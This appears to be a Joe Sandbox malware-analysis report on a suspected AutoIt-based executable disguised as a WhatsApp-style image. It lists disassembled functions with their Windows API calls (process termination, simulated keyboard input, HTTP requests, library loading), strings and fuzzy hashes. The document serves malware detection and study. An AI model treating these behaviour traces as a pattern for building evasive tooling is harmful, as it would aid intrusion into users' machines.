Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 0165fd5d629550198e0d70710db83f5e55196011f3a39d97e7417999cdca90cc
Instruction ID: 4296afb8b2c1afd1adc771da67b1771e721d43cf7ff799a02aff5fb00f648685
Opcode Fuzzy Hash: 0165fd5d629550198e0d70710db83f5e55196011f3a39d97e7417999cdca90cc
Instruction Fuzzy Hash: 9E0167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C47A42C7F5A864CBE5

Function 000C9AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 1423608774-0
Opcode ID: f521a3bd97579be5a149aefce4a8d13c0aa4e399f144a435f6628e899f117422
Instruction ID: 3c16769e6e3efdc0ab4909cde39d1b27bf0a98f765a4df498d0081b0da2ad228
Opcode Fuzzy Hash: f521a3bd97579be5a149aefce4a8d13c0aa4e399f144a435f6628e899f117422
Instruction Fuzzy Hash: 63018132102611ABD7151B94FC4CEEF77A9FF88701B44042DF543928A4DBB4A840DB91

Function 000C7BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 000C7C07
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 000C7C1D
GetWindowThreadProcessId.USER32(?,?), ref: 000C7C2C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 000C7C3B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 000C7C45
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 000C7C4C

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: faf0e98dedc54a338f8dd67319a504a580908fe0f5de121486915c26eef95531
Instruction ID: 78899d73ed1e63c356bf3315f9e24c45ba5191e6924ef594933aa09e94439101
Opcode Fuzzy Hash: faf0e98dedc54a338f8dd67319a504a580908fe0f5de121486915c26eef95531
Instruction Fuzzy Hash: AEF03A72241158BBE7215B92AC0EEEF7FBCEFC6B11F000018FA4192451EBE15A81D6B5

Function 000C9A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 000C9A33
EnterCriticalSection.KERNEL32(?,?,?,?,000F5DEE,?,?,?,?,?,0008ED63), ref: 000C9A44
TerminateThread.KERNEL32(?,000001F6,?,?,?,000F5DEE,?,?,?,?,?,0008ED63), ref: 000C9A51
WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,000F5DEE,?,?,?,?,?,0008ED63), ref: 000C9A5E

Part of subcall function 000C93D1: CloseHandle.KERNEL32(?,?,000C9A6B,?,?,?,000F5DEE,?,?,?,?,?,0008ED63), ref: 000C93DB

InterlockedExchange.KERNEL32(?,000001F6), ref: 000C9A71
LeaveCriticalSection.KERNEL32(?,?,?,?,000F5DEE,?,?,?,?,?,0008ED63), ref: 000C9A78

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 463b92f2a4150bfbf07618e9be5e7a304ab9b25e572e2886fad3ed8a50a31ec3
Instruction ID: 4333b7c17ade0ffbeb3b386b1ffd82b121abd5f9589a97742c96cb15a429712b
Opcode Fuzzy Hash: 463b92f2a4150bfbf07618e9be5e7a304ab9b25e572e2886fad3ed8a50a31ec3
Instruction Fuzzy Hash: 83F0B832142201ABD3112BE4FC8CEEE3779FF88302B440029F243A18A4CBB49980DBA0

Function 00081CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON

Download Yara Rule

APIs

Part of subcall function 0009F4EA: std::exception::exception.LIBCMT ref: 0009F51E
Part of subcall function 0009F4EA: __CxxThrowException@8.LIBCMT ref: 0009F533

__swprintf.LIBCMT ref: 00081EA6

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00081D49

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 2125237772-557222456
Opcode ID: 2c85ca463d5b3ac72677113bf7be305238bce4e9d913f16b257847f8151e6fc5
Instruction ID: 7ba2eb45320488c05626eed129332bf255b282fd022553d5a0cbd09b42c22a7e
Opcode Fuzzy Hash: 2c85ca463d5b3ac72677113bf7be305238bce4e9d913f16b257847f8151e6fc5
Instruction Fuzzy Hash: 46916A71108205AFD724FF24C996CAEB7E8BF95700F04492DF986972A2DB30ED45DB92

Function 000DAFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 000DB006
CharUpperBuffW.USER32(?,?), ref: 000DB115
VariantClear.OLEAUT32(?), ref: 000DB298

Part of subcall function 000C9DC5: VariantInit.OLEAUT32(00000000), ref: 000C9E05
Part of subcall function 000C9DC5: VariantCopy.OLEAUT32(?,?), ref: 000C9E0E
Part of subcall function 000C9DC5: VariantClear.OLEAUT32(?), ref: 000C9E1A

Strings

AUTOIT.ERROR, xrefs: 000DB11B
Incorrect Parameter format, xrefs: 000DB03E, 000DB20B

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 95304e4dc9ce862d289c7fb910c9dbcf8748e0a340278b8b9723462e1b3a1207
Instruction ID: 439c1e67794b40d8d807e9280dd315cd310771cfe07cb287632cdc7879160fc8
Opcode Fuzzy Hash: 95304e4dc9ce862d289c7fb910c9dbcf8748e0a340278b8b9723462e1b3a1207
Instruction Fuzzy Hash: 7C913A75608301DFCB10EF64C4859AEBBE4BF89704F04496EF89A9B352DB31E945CB62

Function 000C5347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0009C6F4: _wcscpy.LIBCMT ref: 0009C717

_memset.LIBCMT ref: 000C5438
GetMenuItemInfoW.USER32(?), ref: 000C5467
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 000C5513
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 000C553D

Strings

0, xrefs: 000C5430

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: a3257a6e47b3faaf4d44a9992dc456ed6e842645e1660cc60640c1c256c5a501
Instruction ID: 268ccba4b6d6339f33b2b19b2aa4dd004e943461e0334b9317d11ff340381e25
Opcode Fuzzy Hash: a3257a6e47b3faaf4d44a9992dc456ed6e842645e1660cc60640c1c256c5a501
Instruction Fuzzy Hash: D1512339504B019BD7949B28CC41FAFB7E8EF95366F04062DF895D31A1EBA0EDC08B52

Function 000C0213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 000C027B
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 000C02B1
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 000C02C2
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 000C0344

Strings

DllGetClassObject, xrefs: 000C02B7

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 83bb1a8bf9bb56e3617659d9cecaf5457e7346deb4cd4b6e96a6b6753431b58c
Instruction ID: 758dc15a9316f10af351a136666aaa1dd6ee8ffba14ebfa92443e3e7d074758c
Opcode Fuzzy Hash: 83bb1a8bf9bb56e3617659d9cecaf5457e7346deb4cd4b6e96a6b6753431b58c
Instruction Fuzzy Hash: B9415AB1604204EFDB55CF64C884F9EBBB9EF44314F1480ADE9099F256D7B1DA45CBA0

Function 000C5007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000C5075
GetMenuItemInfoW.USER32 ref: 000C5091
DeleteMenu.USER32(00000004,00000007,00000000), ref: 000C50D7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00141708,00000000), ref: 000C5120

Strings

0, xrefs: 000C506D

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: ea7cfece8572e9aa81f90e3d366d1344b2985f6b8aac5a3260e723df2599702e
Instruction ID: 5cd4556290aa18f8cdd3c49e5292223d47ed748649fd45e759a70556cf65d6a9
Opcode Fuzzy Hash: ea7cfece8572e9aa81f90e3d366d1344b2985f6b8aac5a3260e723df2599702e
Instruction Fuzzy Hash: CC418C792047019FD7209F24DC88F6EBBE4AF85325F184A1EF99597292D770A980CB62

Function 000C390C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 112keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 000C3966
SetKeyboardState.USER32(00000080,?,00000001), ref: 000C3982
PostMessageW.USER32(00000000,00000102,?,00000001), ref: 000C39EF
SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 000C3A4D

Strings

806ddv806ddv806ddv806ddv806ddv866ddv866ddv886ddv896ddv886ddv856ddv8e6ddv826ddv8f6ddv8e6ddv8f6ddv8f6ddv8f6ddv8f6ddv8b6ddv896ddv866d, xrefs: 000C399D

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID: 806ddv806ddv806ddv806ddv806ddv866ddv866ddv886ddv896ddv886ddv856ddv8e6ddv826ddv8f6ddv8e6ddv8f6ddv8f6ddv8f6ddv8f6ddv8b6ddv896ddv866d
API String ID: 432972143-3192337943
Opcode ID: 0712e0864dde654b9c2ed3a4acb698c382901987bc9713cf2ab2f0667a62e490
Instruction ID: df809b266bd34a463e69f0303119fcd83fa0f5c76d0b8a5270b9932fed87ca94
Opcode Fuzzy Hash: 0712e0864dde654b9c2ed3a4acb698c382901987bc9713cf2ab2f0667a62e490
Instruction Fuzzy Hash: F5412770A14208AEEF709BA49805FFDBBF5EB59310F04815EE4C1A22C1C7F48E95D762

Function 000C3A61 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 104keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 000C3AB8
SetKeyboardState.USER32(00000080,?,00008000), ref: 000C3AD4
PostMessageW.USER32(00000000,00000101,00000000,?), ref: 000C3B34
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 000C3B92

Strings

806ddv806ddv806ddv806ddv806ddv866ddv866ddv886ddv896ddv886ddv856ddv8e6ddv826ddv8f6ddv8e6ddv8f6ddv8f6ddv8f6ddv8f6ddv8b6ddv896ddv866d, xrefs: 000C3AF2

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID: 806ddv806ddv806ddv806ddv806ddv866ddv866ddv886ddv896ddv886ddv856ddv8e6ddv826ddv8f6ddv8e6ddv8f6ddv8f6ddv8f6ddv8f6ddv8b6ddv896ddv866d
API String ID: 432972143-3192337943
Opcode ID: 0b1ec0c82158b412fda1ae7470843f0b530660e30590b435f9ff56454f2b668e
Instruction ID: b0c3c7a28483137a53e11c17e54d3f453047cc512fe3f4254ae951456d6d4038
Opcode Fuzzy Hash: 0b1ec0c82158b412fda1ae7470843f0b530660e30590b435f9ff56454f2b668e
Instruction Fuzzy Hash: 0C317330A10258AEEF709BA48819FFE7BF99B45310F04811EE6C1A32D2C7B48F81C761

Function 000E0567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?), ref: 000E0587

Strings

winapi, xrefs: 000E05F8
stdcall, xrefs: 000E0609
none, xrefs: 000E0662
cdecl, xrefs: 000E05DE

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 2358735015-567219261
Opcode ID: 17d424fb656f4e6f67644ba4960175bd4f2370427b76f808ed244d9c7998ad97
Instruction ID: 906748caed22285b8f409d29a700cdb84832eba0b14d98a821fc0fcfa555d582
Opcode Fuzzy Hash: 17d424fb656f4e6f67644ba4960175bd4f2370427b76f808ed244d9c7998ad97
Instruction Fuzzy Hash: 0731B070500656AFCF00EF64C941AEEB3B4FF55314B008629E466B73D2DBB1E946CB90

Function 000BB80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 000BB88E
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 000BB8A1
SendMessageW.USER32(?,00000189,?,00000000), ref: 000BB8D1

Strings

ComboBox, xrefs: 000BB815
ListBox, xrefs: 000BB84D

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 3e80bdfdd603e27f7a1ddca7ddac392e821cd370ac3de9a80b44cf2f9f919832
Instruction ID: 05d3e25ec59f4e7a5134631049db91f0f30ad294dceeeb56c3f9d08c41af9959
Opcode Fuzzy Hash: 3e80bdfdd603e27f7a1ddca7ddac392e821cd370ac3de9a80b44cf2f9f919832
Instruction Fuzzy Hash: D121E175900108AFEB14ABA4D886DFE77B8EF05350B144129F061A31E2DBB54D069B60

Function 000851AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0008522F
_wcscpy.LIBCMT ref: 00085283
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00085293
LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 000F3CB0

Strings

Line: , xrefs: 000F3CD9

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: IconLoadNotifyShell_String_memset_wcscpy
String ID: Line:
API String ID: 1053898822-1585850449
Opcode ID: 9c3c143739b3ceca66a1c8d85a1158dc8ef7763cf07e88cc41cd1d378fcf0ced
Instruction ID: 6d8badd5061511bda8d0c03649d0e62b36d40e0fbfcf09b430b76e1b389823ac
Opcode Fuzzy Hash: 9c3c143739b3ceca66a1c8d85a1158dc8ef7763cf07e88cc41cd1d378fcf0ced
Instruction Fuzzy Hash: 1D31AF71008744AED735FB60DC46FDEB7D8BF45310F00451AF5C5925A2EB70A688CB96

Function 000D43E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 000D4401
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000D4427
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 000D4457
InternetCloseHandle.WININET(00000000), ref: 000D449E

Part of subcall function 000D5052: GetLastError.KERNEL32(?,?,000D43CC,00000000,00000000,00000001), ref: 000D5067

Strings

, xrefs: 000D4450

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 1951874230-3916222277
Opcode ID: 0dfc79ae610ee06a93d8f7180cb474169965f5c3c7f70b35181b36247752fafc
Instruction ID: 208c0a1e270488363f0c317eb36b2bbab4cfe142ad7b13848e6f103c469ffc20
Opcode Fuzzy Hash: 0dfc79ae610ee06a93d8f7180cb474169965f5c3c7f70b35181b36247752fafc
Instruction Fuzzy Hash: 39218EB2500308BFE7219F94DC85EBFBAECEB48748F10801BF549A2241EA748D859B71

Function 000E90E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 0009D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0009D1BA
Part of subcall function 0009D17C: GetStockObject.GDI32(00000011), ref: 0009D1CE
Part of subcall function 0009D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0009D1D8

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 000E915C
LoadLibraryW.KERNEL32(?), ref: 000E9163
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 000E9178
DestroyWindow.USER32(?), ref: 000E9180

Strings

SysAnimate32, xrefs: 000E9137

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 923bdfdfed140678e67806437529b33adaaa6cd5e70a79eaf19f7a9387a24d47
Instruction ID: ff8c1e0d0a74f49edede31c9902696a998cf08ff9a223d62f5de50751ef627f7
Opcode Fuzzy Hash: 923bdfdfed140678e67806437529b33adaaa6cd5e70a79eaf19f7a9387a24d47
Instruction Fuzzy Hash: F1219D71200286BFEF204E66DC88EFA37EDEF99364F100658FA54A2190C772DC81A760

Function 000C9568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 000C9588
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 000C95B9
GetStdHandle.KERNEL32(0000000C), ref: 000C95CB
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 000C9605

Strings

nul, xrefs: 000C9600

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
